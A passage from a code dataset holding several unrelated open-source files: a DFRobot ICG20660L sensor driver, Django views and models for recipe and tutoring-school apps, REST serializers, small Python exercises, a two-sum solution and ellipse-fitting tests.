DFRobot_ICG20660L_IIC(DFRobot_ICG20660L):\n    def __init__(self,addr):\n        '''!\n        @brief The constructor of the ICG20660L sensor using IIC communication.\n        @param addr: 7-bit IIC address, controlled by SDO pin.\n        @n IIC_ADDR_SDO_H or 0x69: SDO pull high. (default)\n        @n IIC_ADDR_SDO_L or 0x68: SDO pull down.\n        '''\n        self._addr = addr\n        self._bus = smbus.SMBus(1)\n        DFRobot_ICG20660L.__init__(self)\n\n\n    def _write_bytes(self, reg, buf):\n        try:\n            self._bus.write_i2c_block_data(self._addr, reg, buf)\n        except Exception:\n            pass\n\n    def _read_bytes(self, reg, length):\n        try:\n            rslt = self._bus.read_i2c_block_data(self._addr, reg, length)\n            return rslt\n        except Exception:\n            return [0]*length\n\nclass DFRobot_ICG20660L_SPI(DFRobot_ICG20660L):\n    def __init__(self, cs):\n        '''!\n        @brief The constructor of the ICG20660L sensor using SPI communication.\n        @param cs: SPI chip select pin, connected to IO pin of raspberry pi.\n        '''\n        \n        GPIO.setmode(GPIO.BCM)\n        GPIO.setwarnings(False)\n        self._cs = cs\n        self._spi = spidev.SpiDev()\n        self._spi.open(0,0)\n        self._spi.no_cs = True\n        self._spi.max_speed_hz = 7000000\n        GPIO.setup(self._cs, GPIO.OUT)\n        DFRobot_ICG20660L.__init__(self)\n\n    def _write_bytes(self, reg, buf):\n        try:\n            self.set_cs_low()\n            self._spi.writebytes([reg])\n            self._spi.writebytes(buf)\n            self.set_cs_high()\n        except Exception:\n            pass\n\n    def _read_bytes(self, reg, length):\n        try:\n            self.set_cs_low()\n            reg |= 0x80\n            self._spi.writebytes([reg])\n            rslt = self._spi.readbytes(length)\n            self.set_cs_high()\n            return rslt\n        except Exception:\n            return [0]*length\n\n    def set_cs_low(self):\n        GPIO.output(self._cs, GPIO.LOW)\n\n    def set_cs_high(self):\n        GPIO.output(self._cs, GPIO.HIGH)\n    \n\n\n","repo_name":"DFRobot/DFRobot_ICG20660L","sub_path":"python/raspberrypi/DFRobot_ICG20660L.py","file_name":"DFRobot_ICG20660L.py","file_ext":"py","file_size_in_byte":64968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"28117784112","text":"from django.http import Http404, HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.template import loader\nfrom django.urls import reverse_lazy\nfrom django.db import models\nfrom django.core.paginator import Paginator\nfrom django.core.exceptions import PermissionDenied\n\nfrom .models import Ingredient, Dish, Recipe, Fridge, recipe_finder, recipe_finder_session, Unit, get_dish_energy\nfrom .forms import NewIngredient, NewDish, DishForm, AddIngredient, EditIngredient\n\n\ndef index(request):\n    \"\"\"\n    View for the home page.\n    :param request: Django request\n    :return: Django HttpResponse.\n    \"\"\"\n\n    edit = request.GET.get('edit_mode')\n\n    current_user = request.user\n    if current_user.is_authenticated:\n        # get ingredients from users fridge for creating view\n        fridge_ing = Fridge.objects.filter(user_id=current_user.id, is_available=True).select_related('ingredient')\n\n        if request.method == 'POST':\n            # check for POST called from deletion; the delete buttons POST the\n            # ingredient_id as the field name\n            
is_deleted = False\n            for temp in fridge_ing:\n                if str(temp.ingredient_id) in request.POST:\n                    temp.is_available = False\n                    temp.save()\n                    form = AddIngredient()\n                    is_deleted = True\n                    break\n\n            # else check for submitting new ingredient for fridge\n            if not is_deleted:\n                form = AddIngredient(request.POST)\n                if form.is_valid():\n                    ing_id = form.cleaned_data['ingredient'].id\n                    try:\n                        k = Fridge.objects.get(user_id=current_user.id, ingredient_id=ing_id)\n                        k.is_available = True\n                        k.save()\n                    except Fridge.DoesNotExist:\n                        k = Fridge(user_id=current_user.id, ingredient_id=ing_id)\n                        k.save()\n\n            # calls one more time for updating ingredient list\n            fridge_ing = Fridge.objects.filter(user_id=current_user.id, is_available=True).select_related('ingredient')\n        else:\n            form = AddIngredient()\n\n        available_dish_id = recipe_finder(current_user)\n        dish_list = [Dish.objects.get(id=i['id']) for i in available_dish_id]\n        context = {\n            'user': current_user,\n            'ing_list': fridge_ing,\n            'dish_list': dish_list,\n            'form': form,\n        }\n    else:  # for anonymous user (logic same as above)\n        ing_re = request.session.setdefault('ing_re', [])\n        ing_list = [Ingredient.objects.get(id=i) for i in request.session['ing_re']]\n        if request.method == 'POST':\n            is_deleted = False\n            for temp in request.session['ing_re']:\n                if str(temp) in request.POST:\n                    s = request.session['ing_re']\n                    s.remove(temp)\n                    print(\"Left:\", s)\n                    request.session['ing_re'] = s\n                    form = AddIngredient()\n                    is_deleted = True\n                    break\n\n            if not is_deleted:\n                form = AddIngredient(request.POST)\n                if form.is_valid():\n                    ing_id = form.cleaned_data['ingredient'].id\n                    request.session['ing_re'] = ing_re + [ing_id,]\n\n                ing_list = [Ingredient.objects.get(id=i) for i in request.session['ing_re']]\n        else:\n            form = AddIngredient()\n\n        dish_ids = recipe_finder_session(request.session)\n        dish_list = [Dish.objects.get(id=i['id']) for i in dish_ids]\n        context = {\n            'user': request.session,\n            'ing_list': ing_list,\n            'dish_list': dish_list,\n            'form': form,\n        }\n\n    template = loader.get_template('home.html')\n    if edit:\n        print('Get')\n        template = loader.get_template('base.html')\n\n    return HttpResponse(template.render(context, request))\n\n\ndef ing(request, ingredient_id):\n    \"\"\"\n    View for single ingredient.\n    :param request: Django request\n    :param ingredient_id: pk of ingredient\n    :return: Django HttpResponse\n    \"\"\"\n    try:\n        ingredient = Ingredient.objects.get(pk=ingredient_id)\n    except Ingredient.DoesNotExist:\n        raise Http404(\"There is no such ingredient.\")\n\n    edit = request.GET.get('edit_mode')\n\n    context = {\n        'ing': ingredient,\n    }\n\n    if edit:\n        template = loader.get_template('models/ingredient_edit.html')\n        data = {'name': ingredient.name, 'description': ingredient.description, 'energy': ingredient.energy,\n                'proteins': ingredient.proteins, 'fats': ingredient.fats, 'carbohydrate': ingredient.carbohydrate,}\n        form = EditIngredient(data)\n        if request.method == 'POST':\n            form = EditIngredient(request.POST)\n            if form.is_valid():\n                ingredient.name = form.cleaned_data['name']\n                ingredient.description = form.cleaned_data['description']\n                ingredient.energy = form.cleaned_data['energy']\n                ingredient.proteins = form.cleaned_data['proteins']\n                ingredient.fats = form.cleaned_data['fats']\n                ingredient.carbohydrate = form.cleaned_data['carbohydrate']\n                ingredient.save()\n                print('Updated.')\n                return HttpResponseRedirect('../{}'.format(ingredient.id))\n        context['form'] = form\n    else:\n        
template = loader.get_template('models/ingredient.html')\n\n    return HttpResponse(template.render(context, request))\n\n\ndef recipe(request, dish_id):\n    \"\"\"\n    View for single dish. Use forms for configuring ingredients.\n    :param request: Django request\n    :param dish_id: pk of dish\n    :return: Django HttpResponse\n    \"\"\"\n    try:\n        rec = Dish.objects.get(pk=dish_id)\n    except Dish.DoesNotExist:\n        raise Http404(\"There is no such recipe.\")\n\n    edit = request.GET.get('edit_mode')\n\n    # ingredients list for dish, use Recipe model\n    ing_list = Recipe.objects.filter(dish_id=dish_id).select_related('ingredient')\n\n    # Formatting description: \n -> list item\n    html_description = '<ul><li>' + rec.description.replace('\n', '</li><li>') + '</li></ul>'\n    context = {\n        'dish_name': rec.name,\n        'ingredients_list': ing_list,\n        'dish_description': html_description,\n        'energy': get_dish_energy(ing_list),\n    }\n\n    if edit:\n        template = loader.get_template('models/dish_edit.html')\n        data = {'name': rec.name, 'description': rec.description}\n        form = NewDish(data)\n        if request.method == 'POST':\n            form = NewDish(request.POST)\n            form_ing = DishForm(request.POST)\n\n            for temp in ing_list:\n                if 'Delete ' + str(temp.ingredient_id) in request.POST:\n                    Recipe.objects.filter(pk=temp.pk).delete()\n                    form_ing = DishForm()\n                    break\n\n            if form.is_valid():\n                rec.name = form.cleaned_data['name']\n                rec.description = form.cleaned_data['description']\n                rec.save()\n                print('Updated.')\n                return HttpResponseRedirect('../{}'.format(rec.id))\n\n            if form_ing.is_valid():\n                ing2rec = Recipe(dish_id=dish_id, ingredient_id=form_ing.cleaned_data['ingredient'].id,\n                                 amount=form_ing.cleaned_data['amount'], units=form_ing.cleaned_data['units'])\n                ing2rec.save()\n        else:\n            form_ing = DishForm()\n\n        context['form'] = form\n        context['form_ing'] = form_ing\n        ing_list = Recipe.objects.filter(dish_id=dish_id).select_related('ingredient')\n        context['ingredients_list'] = ing_list\n    else:\n        template = loader.get_template('models/dish.html')\n\n    return HttpResponse(template.render(context, request))\n\n\ndef catalog_ingredient(request):\n    \"\"\"\n    View for the ingredient catalog\n    :param request: Django request\n    :return: HttpResponse\n    \"\"\"\n    ing_list = Ingredient.objects.all().order_by('id')\n\n    # Django paginator (Maybe use direct request to DB?)\n    paginator = Paginator(ing_list, 20)\n    page = request.GET.get('page')\n    product = paginator.get_page(page)\n\n    # edit mode\n    edit = request.GET.get('edit_mode')\n\n    if edit and request.method == 'POST':\n        for temp in product:\n            if ('Delete ' + str(temp.id)) in request.POST:\n                ingredient = Ingredient.objects.get(pk=temp.pk)\n                try:\n                    ingredient.delete()\n                    break\n                except models.ProtectedError:\n                    # error page\n                    return ingredient_error(request, ingredient)\n\n            elif ('Edit ' + str(temp.id)) in request.POST:\n                ingredient = Ingredient.objects.get(pk=temp.pk)\n                return HttpResponseRedirect('{}?edit_mode=True'.format(ingredient.id))\n\n        ing_list = Ingredient.objects.all().order_by('id')\n        paginator = Paginator(ing_list, 20)\n        page = request.GET.get('page')\n        product = paginator.get_page(page)\n\n    template = loader.get_template('models/ingredient_catalog.html')\n    context = {\n        'product': product,\n        'edit': edit,\n    }\n    return HttpResponse(template.render(context, request))\n\ndef create_ingredient(request):\n    \"\"\"\n    View for creating ingredients\n    :param request: Django request\n    :return: HttpResponse\n    \"\"\"\n    if not request.user.is_staff:\n        raise PermissionDenied\n    if request.method == 'POST':\n        form = NewIngredient(request.POST)\n        if form.is_valid():\n            ing = Ingredient(name=form.cleaned_data['name'], description=form.cleaned_data['description'],\n                             energy=form.cleaned_data['energy'], proteins=form.cleaned_data['proteins'],\n                             fats=form.cleaned_data['fats'], carbohydrate=form.cleaned_data['carbohydrate'])\n            ing.save()\n            return HttpResponseRedirect('{}'.format(ing.id))\n    else:\n        form = NewIngredient()\n\n    template = loader.get_template('models/create_ingredient.html')\n    context = {\n        'form': form,\n    }\n    return HttpResponse(template.render(context, request))\n\ndef catalog_recipe(request):\n    \"\"\"\n    View for the dish catalog\n    :param request: Django request\n    :return: HttpResponse\n    \"\"\"\n    dish_list = Dish.objects.all().order_by('id')\n\n    
paginator = Paginator(dish_list, 20)\n    page = request.GET.get('page')\n    menu = paginator.get_page(page)\n\n    # edit mode\n    edit = request.GET.get('edit_mode')\n\n    if edit and request.method == 'POST':\n        for temp in dish_list:\n            if ('Delete ' + str(temp.id)) in request.POST:\n                Dish.objects.filter(pk=temp.pk).delete()\n                break\n            elif ('Edit ' + str(temp.id)) in request.POST:\n                dish = Dish.objects.get(pk=temp.pk)\n                return HttpResponseRedirect('{}?edit_mode=True'.format(dish.id))\n\n        dish_list = Dish.objects.all().order_by('id')\n        paginator = Paginator(dish_list, 20)\n        page = request.GET.get('page')\n        menu = paginator.get_page(page)\n\n    template = loader.get_template('models/catalog.html')\n    context = {\n        'menu': menu,\n        'edit': edit,\n    }\n    return HttpResponse(template.render(context, request))\n\ndef create_dish(request):\n    \"\"\"\n    View page for Dish creation. Ingredients can be added during creation.\n    :param request: Django request\n    :return: HttpResponse\n    \"\"\"\n    if not request.user.is_staff:\n        raise PermissionDenied\n\n    i_list = request.session.setdefault('i_list', [])\n    ingredients_list = [(Ingredient.objects.get(id=i[0]), i[1], Unit.objects.get(id=i[2])) for i in request.session['i_list']]\n\n    if request.method == 'POST':\n        form = NewDish(request.POST)\n        form_ing = DishForm(request.POST)\n\n        not_deleted = True\n        for temp in request.session['i_list']:\n            if 'Delete ' + str(temp[0]) in request.POST:\n                s = request.session['i_list']\n                s.remove(temp)\n                print(\"Left:\", s)\n                request.session['i_list'] = s\n                form_ing = DishForm()\n                not_deleted = False\n                break\n\n        if not_deleted and form_ing.is_valid():\n            ing_param = (form_ing.cleaned_data['ingredient'].id, float(form_ing.cleaned_data['amount']),\n                         form_ing.cleaned_data['units'].id)\n            i_list = request.session['i_list']\n            request.session['i_list'] = i_list + [ing_param,]\n        elif not_deleted and form.is_valid():\n            d = Dish(name=form.cleaned_data['name'], description=form.cleaned_data['description'])\n            d.save()\n            for ing in ingredients_list:\n                ing2rec = Recipe(dish_id=d.id, ingredient_id=ing[0].id, amount=ing[1], units_id=ing[2].id)\n                ing2rec.save()\n            # clear the staged ingredients only after every row has been saved\n            request.session['i_list'] = []\n\n            return HttpResponseRedirect('{}'.format(d.id))\n\n        ingredients_list = [(Ingredient.objects.get(id=i[0]), i[1], Unit.objects.get(id=i[2])) for i in request.session['i_list']]\n    else:\n        form = NewDish()\n        form_ing = DishForm()\n\n    template = loader.get_template('models/create_dish.html')\n    context = {\n        'form': form,\n        'form_ing': form_ing,\n        'ingredients_list': ingredients_list,\n    }\n    return HttpResponse(template.render(context, request))\n\ndef ingredient_error(request, ing):\n    \"\"\"\n    Error page shown when somebody tries to delete an ingredient that is in use.\n    :param request: Django request\n    :param ing: the ingredient that could not be deleted\n    :return: HttpResponse\n    \"\"\"\n    ingredient_name = ing.name\n    recipes_list = Recipe.objects.filter(ingredient=ing.id)\n    template = loader.get_template('models/delete_error.html')\n    context = {\n        \"ingredient_name\": ingredient_name,\n        \"recipes_list\": recipes_list,\n    }\n    return HttpResponse(template.render(context, request))\n\ndef help_page(request):\n    \"\"\"\n    Help page with information\n    :param request: Django request\n    :return: HttpResponse\n    \"\"\"\n    template = loader.get_template('help.html')\n    context = {}\n    return 
HttpResponse(template.render(context,request))\n","repo_name":"Ollleksa/RecipeHelper","sub_path":"Picker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11186544735","text":"from rest_framework import serializers\nfrom ..models.banners import Banner\nfrom ..constants import constants\nfrom rest_framework import exceptions\n\n\nclass AddBannerSerializer(serializers.ModelSerializer):\n picture_url = serializers.FileField(write_only=True, required=False, allow_null=True)\n\n def validate(self, data):\n media_file_obj = data.get('picture_url')\n if media_file_obj:\n media_file_size = data.get('picture_url').size\n\n if media_file_size > constants.MEDIA_FILE_SIZE_IMAGE:\n raise exceptions.ValidationError(\"The maximum file size that can be uploaded is 10 MB\")\n else:\n return data\n else:\n return data\n\n class Meta:\n model = Banner\n fields = ['title', 'device_type', 'picture_url', 'sequence_number', 'start_date', 'end_date', 'page_link']\n extra_kwargs = {'title': {'required': True}, 'device_type': {'required': True},\n 'sequence_number': {'required': True}, 'start_date': {'required': True}, 'end_date': {'required': True},\n 'picture_url': {'required': True}\n }\n\n\nclass GetAllBannersSerializer(serializers.ModelSerializer):\n class Meta:\n model = Banner\n fields = ['id', 'title', 'device_type', 'picture_url', 'sequence_number', 'start_date', 'end_date', 'page_link']\n\n\nclass GetBannerByIdSerializer(serializers.ModelSerializer):\n class Meta:\n model = Banner\n fields = ['id', 'title', 'device_type', 'picture_url', 'sequence_number', 'start_date', 'end_date', 'page_link']\n\n\nclass RemoveBannerByIdSerializer(serializers.ModelSerializer):\n class Meta:\n model = Banner\n fields = ['id']\n","repo_name":"avinas-dwivedi/detoxa-backend","sub_path":"detoxa_services/serializers/banners_serializer.py","file_name":"banners_serializer.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26794379343","text":"def word(s):\n lower = 0\n upper = 0\n for i in s:\n if(i.islower()):\n lower+=1\n else:\n upper+=1\n if(upper>lower):\n return s.upper()\n else:\n return s.lower()\n\ns = input()\nprint(word(s))","repo_name":"MrChepe09/Competitive-Programming-Codes","sub_path":"A2OJ/Ladder 0-1300/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"83"} +{"seq_id":"28528302233","text":"def create_dictionary_from_lists(keys: list, values: list, *args, del_none=True, **kwargs):\n \"\"\"\n\n :param keys: list, tuple\n :param values: list, tuple\n :return:\n \"\"\"\n print(kwargs)\n if kwargs.get('upper'):\n keys = list(map(str.upper, keys))\n all_prices = dict(zip(keys, values))\n if del_none:\n all_prices = list(filter(lambda x: x[1] != None, all_prices.items()))\n if kwargs.get('sort_by_price'):\n all_prices.sort(key=lambda x: x[1])\n else:\n all_prices.sort()\n return dict(all_prices)\n\n\ndef print_dict(d: dict):\n for key, value in d.items():\n print(f'Key: {key}, value: {value}')\n\n\nkeys = ['Tv', 'laptop', 'Fan', 'fridge']\nvalues = [20000, 30000, None, 30000]\n\nnew_dict = create_dictionary_from_lists(keys, values, del_none=True, upper=True, sort_by_price=True)\nprint_dict(new_dict)\n\nnames = ['Basil', 'Ivan', 'Katya', 'Sveta']\nsurname = ['Ivanov', 
'Petrov', 'Sinichkina', 'Petrova']\n\nfio_dict = create_dictionary_from_lists(names, values=surname)\nprint_dict(fio_dict)\n\nshort_names = list(map(lambda x: f'{x[0][0]}. {x[1]}', fio_dict.items()))\nprint(short_names)","repo_name":"ilia-brykin/gb","sub_path":"python/teacher/lesson3_functions_dictionaries/funcions_test.py","file_name":"funcions_test.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15702231524","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.timezone import now\nfrom django.contrib.postgres.fields import ArrayField\n\nimport random\nimport string\n\nclass Manager(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n birthday = models.DateField(null=True, blank=True)\n phone = models.CharField(max_length=100, default=\"\")\n bank_details = models.TextField(default=\"\")\n #branch\n # status - archive or not\n\n class Meta:\n verbose_name_plural = 'managers'\n\n def __str__(self):\n return \"{0} {1}\".format(self.user.first_name,self.user.last_name)\n\n\nclass StudentStatus(models.Model):\n title = models.CharField(max_length=30, default=\"Лид\")\n\n class Meta:\n verbose_name_plural = 'student_statuses'\n\n def __str__(self):\n return self.title\n\n#class Promotion\n#trigger promotion using get params from ads\n\n\n\n#class OFD\n\n\nclass Student(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n birthday = models.DateField(null=True, blank=True)\n address = models.CharField(max_length=100)\n amount = models.IntegerField(default=0)\n currency = models.CharField(max_length=4)\n status = models.ForeignKey(StudentStatus, on_delete=models.CASCADE)\n phone = models.CharField(max_length=100, default=\"\")\n bonus = models.PositiveIntegerField(default=0)\n #comment = models.CharField(max_length=500)\n #time_added\n #branches\n #subjects\n #responsible_manager\n #status - archive or not\n #source\n #script of dialog with clients\n #причина отказа\n #promotion = ForeignKey\n\n class Meta:\n verbose_name_plural = 'students'\n\n def __str__(self):\n return \"{0} {1}\".format(self.user.first_name, self.user.last_name)\n\n\nclass Teacher(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n birthday = models.DateField(null=True, blank=True)\n address = models.CharField(max_length=100)\n salary = models.IntegerField(default=0)\n hourly_rate = models.IntegerField(default=250)\n currency = models.CharField(max_length=4)\n phone = models.CharField(max_length=100, default=\"\")\n #branch\n #responsible_manager\n #subjects m2m\n #time_added\n #status - archive or not\n #date_added = models.DateTimeField(default=now,blank=True)\n\n class Meta:\n verbose_name_plural = 'teachers'\n\n def __str__(self):\n return \"{0} {1}\".format(self.user.first_name, self.user.last_name)\n\n\nclass Branch(models.Model):\n title = models.CharField(max_length=30, blank=True, null=True)\n\n class Meta:\n verbose_name_plural = 'branches'\n\n def __str__(self):\n return self.title\n\n\nclass Subject(models.Model):\n title = models.CharField(max_length=30, blank=True, null=True)\n price = models.IntegerField(default=1000)\n # quality_test_for_teacher\n\n class Meta:\n verbose_name_plural = 'subjects'\n\n def __str__(self):\n return self.title\n\n\nclass Module(models.Model):\n title = models.CharField(max_length=30, blank=True, null=True)\n module_number = 
models.IntegerField(default=0)\n subject = models.ForeignKey(Subject, on_delete=models.CASCADE)\n student_text = models.TextField(blank=True, null=True)\n teacher_text = models.TextField(blank=True, null=True)\n\n class Meta:\n verbose_name_plural = 'modules'\n\n def __str__(self):\n return \"{0} ({1})\".format(self.title, self.subject)\n\n\ndef meeting_link():\n letters = string.ascii_lowercase\n meeting_str = ''.join(random.choice(letters) for i in range(10))\n return meeting_str\n\n\nclass Lesson(models.Model):\n name = models.CharField(max_length=100)\n branch = models.ForeignKey(Branch, default=0, on_delete=models.CASCADE)\n students = models.ManyToManyField(Student, blank=True)\n subject = models.ForeignKey(Subject, on_delete=models.CASCADE)\n teacher = models.ManyToManyField(Teacher)\n module = models.ForeignKey(Module, on_delete=models.CASCADE)\n start = models.DateTimeField(default=now,blank=True)\n end = models.DateTimeField(default=now,blank=True)\n duration = models.PositiveIntegerField(default=60)\n homework = models.TextField(blank=True)\n link = models.CharField(max_length=400, default=meeting_link, blank=True)\n finished = models.BooleanField(default=False)\n\n\n class Meta:\n verbose_name_plural = 'lessons'\n\n def __str__(self):\n return self.name + \" \" + str(self.start)\n\n\nclass LessonInfo(models.Model):\n lesson = models.ForeignKey(Lesson, on_delete=models.CASCADE)\n students_visited = models.ManyToManyField(Student)\n user_changed = models.ForeignKey(User, on_delete=models.CASCADE)\n date_changed = models.DateTimeField(default=now,blank=True)\n\n def __str__(self):\n return \"History: \" + str(self.lesson.name)\n\n\nclass Task(models.Model):\n\n HIGH = \"ВЫСОКИЙ\"\n MIDDLE = \"СРЕДНИЙ\"\n LOW = \"НИЗКИЙ\"\n Priority = (\n (HIGH, \"Высокий\"),\n (MIDDLE, \"Средний\"),\n (LOW, \"Низкий\"),\n )\n\n NEW = \"NEW\"\n IN_WORK = \"IN_WORK\"\n FINISHED = \"FINISHED\"\n Status = (\n (NEW, \"New\"),\n (IN_WORK, \"In_work\"),\n (FINISHED, \"Finished\"),\n )\n\n title = models.CharField(max_length=200)\n students = models.ManyToManyField(Student, blank=True)\n description = models.TextField(blank=True)\n executor = models.ManyToManyField(Manager, blank=True)\n priority = models.CharField(max_length=9,\n choices=Priority,\n default=HIGH)\n date_added = models.DateTimeField(default=now,blank=True)\n date_finish = models.DateTimeField(default=now,blank=True)\n status = models.CharField(max_length=9,\n choices=Status,\n default=NEW)\n comment = models.TextField(blank=True)\n\n\n class Meta:\n verbose_name_plural = 'tasks'\n\n def __str__(self):\n return self.title\n\n\nclass KPI(models.Model):\n\n name = models.CharField(max_length=200)\n result = ArrayField(models.IntegerField())\n plan = ArrayField(models.IntegerField())\n year = models.IntegerField(default=2021)\n comment = models.TextField(blank=True)\n\n class Meta:\n verbose_name_plural = 'kpi'\n\n def __str__(self):\n return self.name\n\n\nclass Finance(models.Model):\n\n INCOME = \"Доход\"\n EXPENSE = \"Расход\"\n PaymentType = (\n (INCOME, \"Доход\"),\n (EXPENSE, \"Расход\")\n )\n\n BANK = \"Банковский счет\"\n CARD = \"Перевод на карту\"\n ACQUIRING = \"Эквайринг\"\n TERMINAL = \"Терминал\"\n PFDO = \"Сертификат ПФДО\"\n PaymentAccount = (\n (BANK, \"Банковский счет\"),\n (CARD, \"Перевод на карту\"),\n (ACQUIRING, \"Эквайринг\"),\n (TERMINAL, \"Терминал\"),\n (PFDO, \"Сертификат ПФДО\"),\n )\n\n COURSES = \"Курсы\"\n CAMP = \"Лагерь\"\n RENT = \"Аренда\"\n SALARY = \"Зарплата\"\n ExpenseItem = (\n (COURSES, \"Курсы\"),\n 
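# (stored value, human-readable label) pairs, the shape Django's 'choices'\n        # option expects; the first element is what gets saved in the database.\n        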
(CAMP, \"Лагерь\"),\n (RENT, \"Аренда\"),\n (SALARY, \"Зарплата\"),\n )\n\n title = models.CharField(max_length=200)\n orderId = models.CharField(max_length=200, blank=True)\n payment_type = models.CharField(max_length=50, choices=PaymentType, default=INCOME)\n payment_account = models.CharField(max_length=50, choices=PaymentAccount, default=ACQUIRING)\n expense_item = models.CharField(max_length=50, choices=ExpenseItem, default=COURSES)\n amount = models.PositiveIntegerField(default=0)\n currency = models.CharField(max_length=4, blank=True)\n payment_date = models.DateTimeField(default=now, blank=True)\n date_added = models.DateTimeField(default=now,blank=True)\n user_added = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True)\n comment = models.TextField(blank=True)\n\n class Meta:\n verbose_name_plural = 'Finances'\n\n def __str__(self):\n return self.title\n\n\n#class Branch\n\n\n\n\n\n\n\n","repo_name":"dobriy-zhuk/guarantee_learning","sub_path":"box/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14787580572","text":"\"\"\"\nGiven a 1-indexed array of integers numbers that is already sorted in non-decreasing order, find two numbers such that they add up to a specific target number. Let these two numbers be numbers[index1] and numbers[index2] where 1 <= index1 < index2 <= numbers.length.\n\nReturn the indices of the two numbers, index1 and index2, added by one as an integer array [index1, index2] of length 2.\n\nThe tests are generated such that there is exactly one solution. You may not use the same element twice.\n\nYour solution must use only constant extra space.\n\"\"\"\n\n\ndef two_sum_ii(numbers, target):\n left, right = 0, len(numbers) - 1\n\n while numbers[left] + numbers[right] != target:\n # case 1: sum is too big\n if numbers[left] + numbers[right] > target:\n right -= 1\n # case 2: sum is too small\n elif numbers[left] + numbers[right] < target:\n left += 1\n else:\n break\n\n # indices are 1-indexed for some reason\n return [left + 1, right + 1]\n\n\n\"\"\"\nidea:\n\n- consider the outer most numbers and move inwards\n- because the list is sorted:\n - if the pair of numbers is too big, the right number can never be used as a sum to get target\n - if the pair of numbers is too small, the left number can never be used as a sum to get target\n- with this logic, we can use 2 pointers to close the window to find the sum\n\ntime complexity:\n\n- every number is considered once so the time complexity is O(n)\n - having this sorted doesn't actually impact the time complexity at all\n\nspace complexity:\n\n- everything is done in place so the space complexity is O(1)\n - this does improve the space complexity by not having to need a hash map\n\"\"\"\n","repo_name":"MstrZhang/leetcode","sub_path":"arrays/2sum_ii.py","file_name":"2sum_ii.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6784790225","text":"import numpy as np\nimport pandas as pd\nfrom cell_tracker.analysis import fit_arc_ellipse\nfrom cell_tracker import data\n\ndef get_mock_ellipsis_segment(radius=30, dtheta=4*np.pi/3,\n ellipticity=1.5,\n noise=1e-4, n_points=10,\n t_step=3, rotation=None):\n\n a = 2 * radius /(1 + ellipticity)\n b = 2 * radius /(1 + 1/ellipticity)\n t_stamps = np.arange(n_points)\n ts = t_stamps * t_step\n omega = dtheta / ts.max()\n 
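# The arc below is parametrized as x = a*cos(omega*t), y = b*sin(omega*t);\n    # with omega = dtheta / ts.max() it sweeps dtheta radians over the samples.\n    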
phi_y, x0, y0 = 0, 0, 0\n xs = a * np.cos(omega * ts)\n ys = b * np.sin(omega * ts)\n zs = np.zeros(xs.size)\n x_err = np.random.normal(scale=noise*radius, size=xs.size)\n y_err = np.random.normal(scale=noise*radius, size=xs.size)\n z_err = np.random.normal(scale=noise*radius, size=xs.size)\n\n xs += x_err\n ys += y_err\n zs += z_err\n segment = pd.DataFrame(index=pd.Index(t_stamps, name='t_stamp'),\n data=np.vstack([xs, ys, zs, x_err, y_err, ts]).T,\n columns=['x', 'y', 'z', 'x_err', 'y_err', 't'])\n return segment\n\n\ndef test_simple_ellipis_fit_polar():\n\n segment = get_mock_ellipsis_segment()\n start = segment.index[0]\n stop = segment.index[-1]\n fit_data, components, rotated = fit_arc_ellipse(segment,\n start, stop,\n ['x', 'y', 'z'],\n method='polar',\n return_rotated=True)\n\n assert fit_data is not None\n chi2 = np.exp(-fit_data['gof'])\n np.testing.assert_almost_equal(chi2, 0, decimal=3)\n\ndef test_simple_ellipis_fit_cartes():\n\n segment = get_mock_ellipsis_segment()\n start = segment.index[0]\n stop = segment.index[-1]\n fit_data, components, rotated = fit_arc_ellipse(segment,\n start, stop,\n ['x', 'y', 'z'],\n method='cartesian',\n return_rotated=True)\n\n assert fit_data is not None\n chi2 = np.exp(-fit_data['gof'])\n np.testing.assert_almost_equal(chi2, 0, decimal=3)\n","repo_name":"glyg/cell-tracker","sub_path":"cell_tracker/tests/test_analysis.py","file_name":"test_analysis.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"8843675708","text":"def setify(a):\n result = []\n\n for item in a:\n if item not in result:\n result.append(item)\n\n return result\n\n\ndef diff(a, b):\n result = []\n\n for item in a:\n if item not in b:\n result.append(item)\n\n return setify(result)\n\n\ndef union(a, b):\n return setify(a + b)\n\n\ndef intersection(a, b):\n result = []\n\n for item in a:\n if item in b:\n result.append(item)\n\n return setify(result)\n\n\ndef cartesian_product(a, b):\n # Tuple is (a, b) as a syntax\n result = []\n\n for x in a:\n for y in b:\n result.append((x, y))\n\n return setify(result)\n\n\ndef main():\n print(setify([0, 1, 1, 5, 5, 6, 0, 1]) == [0, 1, 5, 6])\n print(union([0, 0, 0, 0, 0], [1, 2]) == [0, 1, 2])\n print(intersection([0, 0, 1, 2, 5], [5, 5, 6]) == [5])\n print(diff([0, 1, 2, 3, 4, 5], [0, 0, 1, 1, 2, 2, 3, 3]) == [4, 5])\n print(cartesian_product([0, 1, 1], [1, 0]))\n print(cartesian_product([0, 1], [1]) == [(0, 1), (1, 1)])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"HackBulgaria/Programming0-1","sub_path":"week8/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"83"} +{"seq_id":"22621863782","text":"import 